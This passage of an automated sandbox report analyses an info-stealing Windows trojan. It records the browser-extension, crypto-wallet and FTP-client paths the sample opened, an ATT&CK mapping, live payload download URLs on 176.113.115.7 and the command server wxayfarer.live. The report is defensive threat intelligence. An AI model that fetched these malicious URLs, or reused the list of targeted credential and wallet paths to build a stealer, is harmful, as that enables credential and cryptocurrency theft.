    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    Process Injection    		44
    Virtualization/Sandbox Evasion    		2
    OS Credential Dumping    		851
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory44
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol31
    Data from Local System    		2
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
    Obfuscated Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive13
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
    Software Packing    		NTDS1
    File and Directory Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets223
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648110 Sample: ASIr1Bo2x9.exe Startdate: 25/03/2025 Architecture: WINDOWS Score: 100 10 wxayfarer.live 2->10 16 Antivirus detection for URL or domain 2->16 18 Antivirus / Scanner detection for submitted sample 2->18 20 Multi AV Scanner detection for submitted file 2->20 22 3 other signatures 2->22 6 ASIr1Bo2x9.exe 2->6         started        signatures3 process4 dnsIp5 12 176.113.115.7, 80 SELECTELRU Russian Federation 6->12 14 wxayfarer.live 104.21.80.1, 443, 49723, 49724 CLOUDFLARENETUS United States 6->14 24 Detected unpacking (changes PE section rights) 6->24 26 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->26 28 Query firmware table information (likely to detect VMs) 6->28 30 9 other signatures 6->30 signatures6

    Screenshots

    Download Video

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ASIr1Bo2x9.exe58%VirustotalBrowse
    ASIr1Bo2x9.exe69%ReversingLabsWin32.Trojan.Cerbu
    ASIr1Bo2x9.exe100%AviraTR/Crypt.TPM.Gen

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://wxayfarer.live/ALosnz6/D100%Avira URL Cloudmalware
    http://176.113.115.7:80/mine/random.exe100%Avira URL Cloudmalware
    https://wxayfarer.live/ALosnzNp100%Avira URL Cloudmalware
    http://176.113.115.7/mine/ran0%Avira URL Cloudsafe
    https://wxayfarer.live/$~100%Avira URL Cloudmalware
    http://176.113.115.7/mine/random.exe.100%Avira URL Cloudmalware
    https://wxayfarer.live/ALosnzl9100%Avira URL Cloudmalware
    http://176.113.115.7//0%Avira URL Cloudsafe
    https://wxayfarer.live:443/ALosnz100%Avira URL Cloudmalware
    https://wxayfarer.live/ALosnze100%Avira URL Cloudmalware
    https://wxayfarer.live/ALosnzc100%Avira URL Cloudmalware

    Domains and IPs

    Download Network PCAP: filteredfull

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    wxayfarer.live
    		104.21.80.1
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://wxayfarer.live/ALosnzfalse
        		high
        NameSourceMaliciousAntivirus DetectionReputation
        https://wxayfarer.live/ALosnz6/DASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://176.113.115.7:80/mine/random.exeASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://176.113.115.7/mine/ranASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://duckduckgo.com/ac/?q=ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://wxayfarer.live/$~ASIr1Bo2x9.exe, 00000000.00000003.1384924260.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          http://176.113.115.7/mine/random.exe.ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DEE000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://crl.rootca1.amazontrust.com/rootca1.crl0ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://ac.ecosia.org?q=ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://176.113.115.7/mine/random.exeASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.rootca1.amazontrust.com0:ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://wxayfarer.live/ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385837903.0000000000DFF000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1299973451.0000000000D74000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://wxayfarer.live/ALosnzNpASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392937738.0000000000DF3000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.google.com/images/branding/product/ico/googleg_alldp.icoASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.ecosia.org/newtab/v20ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://wxayfarer.live/ALosnzl9ASIr1Bo2x9.exe, 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://x1.c.lencr.org/0ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://x1.i.lencr.org/0ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabv20ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://176.113.115.7//ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://wxayfarer.live:443/ALosnzASIr1Bo2x9.exe, 00000000.00000003.1325200671.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?ASIr1Bo2x9.exe, 00000000.00000003.1349659412.0000000005917000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://wxayfarer.live/ALosnzeASIr1Bo2x9.exe, 00000000.00000003.1392893647.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408641390.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385095106.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1386096339.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408441458.0000000000E11000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://support.mozilla.org/products/firefoxgro.allASIr1Bo2x9.exe, 00000000.00000003.1351491258.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://wxayfarer.live/ALosnzcASIr1Bo2x9.exe, 00000000.00000003.1325142805.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325382510.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1325302395.0000000000E11000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://gemini.google.com/app?q=ASIr1Bo2x9.exe, 00000000.00000003.1306980964.000000000587A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://176.113.115.7/ASIr1Bo2x9.exe, 00000000.00000002.1629251769.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                176.113.115.7
                                                		unknownRussian Federation
                                                		49505SELECTELRUfalse
                                                104.21.80.1
                                                		wxayfarer.liveUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1648110
                                                Start date and time:2025-03-25 14:58:08 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 52s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:ASIr1Bo2x9.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:f9915de2e2ca00d8d19a8d021b433926.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@1/2
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 4
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 184.31.69.3, 4.175.87.197
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target ASIr1Bo2x9.exe, PID 7588 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:59:18API Interceptor33x Sleep call for process: ASIr1Bo2x9.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                176.113.115.7random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                • 176.113.115.7/mine/random.exe
                                                6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
                                                • 176.113.115.7/mine/random.exe
                                                work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                • 176.113.115.7/files/unique2/random.exe
                                                random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
                                                • 176.113.115.7/files/crazytimeya/random.exe
                                                random.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.7/files/qqdoup/random.exe
                                                VSAXXKuhCu.exeGet hashmaliciousAmadey, AsyncRATBrowse
                                                • 176.113.115.7/files/unique2/random.exe
                                                L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                • 176.113.115.7/files/qqdoup/random.exe
                                                13s1HMkHKv.exeGet hashmaliciousAmadey, DarkVision Rat, Fallen Miner, LummaC StealerBrowse
                                                • 176.113.115.7/files/2043702969/dx3hXS1.exe
                                                wJWNpO6lcm.exeGet hashmaliciousAmadey, GCleaner, LummaC StealerBrowse
                                                • 176.113.115.7/files/unique2/random.exe
                                                download.php.exe.bin.exeGet hashmaliciousAmadey, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                • 176.113.115.7/mine/random.exe
                                                104.21.80.1invoice.exeGet hashmaliciousFormBookBrowse
                                                • www.mulher777.info/wtn0/
                                                Cv.exeGet hashmaliciousFormBookBrowse
                                                • www.mulher777.info/fowj/
                                                Arma Ferro - RFQ 987653411.exeGet hashmaliciousFormBookBrowse
                                                • www.dramavietsub.net/xn0a/?Fb=4ED9+CMUbnmN5pxC68fHf0LYHtaNT0e8IHhtvZswML/bPoiJGCaeeIZEe50hSvxGzg13paLMmRN6cIdy9lHXnMZwwK17WEvumNO+DXUvtZE5GG2E5PZaRt4=&Ft04=iDlT
                                                UW2025-020#U00b7pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.dramavietsub.net/rcu7/
                                                5047792048pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.dramavietsub.net/rcu7/?mbHTH=XRIXlKxnJVFUKEthJ4b1to75Xwh5Yc5hiRmvyKKqHzw4uge11MOII5dk9Gg7nuPf7mux8eELG7q95sMQ7MUe1hBR0dSMf0JiCewN4BGJ1X0IJ/mT1e/Enwc=&9j=Plml
                                                16Vzai4jwT.exeGet hashmaliciousCobaltStrikeBrowse
                                                • cpvnxker.xyz/headimage.jpg
                                                MG710417.exeGet hashmaliciousAzorultBrowse
                                                • gd53.cfd/TL341/index.php
                                                PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                • touxzw.ir/scc1/five/fre.php
                                                DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                • www.rbopisalive.cyou/2dxw/
                                                Marzec 2025-faktura.pdf.exeGet hashmaliciousFormBookBrowse
                                                • www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                wxayfarer.liveQyk8RJnGN7.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.112.1
                                                9GNLDc2CHH.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                jx22fssg2d.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.16.1
                                                EUsF26UAMM.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.16.1
                                                ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.16.1
                                                random(3).exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.96.1
                                                random(9).exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, Socks5SystemzBrowse
                                                • 104.21.64.1
                                                ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.16.1
                                                random.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.32.1
                                                random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                • 104.21.112.1

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUSySTYvI9Pvk.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.25.9
                                                6aOM10d2pR.exeGet hashmaliciousLummaC StealerBrowse
                                                • 172.67.182.237
                                                Ec0AgD2t1q.exeGet hashmaliciousDarkVision RatBrowse
                                                • 172.67.68.246
                                                https://medpetroenergydmcc.com/court/Get hashmaliciousHTMLPhisherBrowse
                                                • 104.21.16.1
                                                750413b4e6897a671bc759e04597952a0be747830189873b.xlsm.1.ps1Get hashmaliciousLummaC StealerBrowse
                                                • 104.21.96.1
                                                Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msgGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                • 162.159.136.234
                                                Discord rat.exeGet hashmaliciousDiscord RatBrowse
                                                • 162.159.134.234
